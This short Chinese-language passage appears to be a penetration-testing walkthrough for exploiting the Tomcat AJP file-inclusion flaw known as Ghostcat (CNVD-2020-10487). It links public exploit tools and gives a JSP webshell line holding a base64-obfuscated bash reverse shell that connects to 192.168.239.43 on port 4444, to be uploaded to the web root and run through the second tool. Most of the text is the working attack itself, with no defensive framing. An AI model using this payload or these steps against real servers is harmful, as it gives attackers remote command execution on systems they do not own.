查看tomcat默认页面，此时通过AJP协议的8009端口亦可访问Tomcat。

利用如下工具均可测试漏洞：

• https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

工具需要用到python2，

如果需要进一步利用需要向服务器的/webapps/ROOT目录下上传恶意文件

<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS40My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}");%>

利用工具https://github.com/00theway/Ghostcat-CNVD-2020-10487

进行执行上传的恶意文件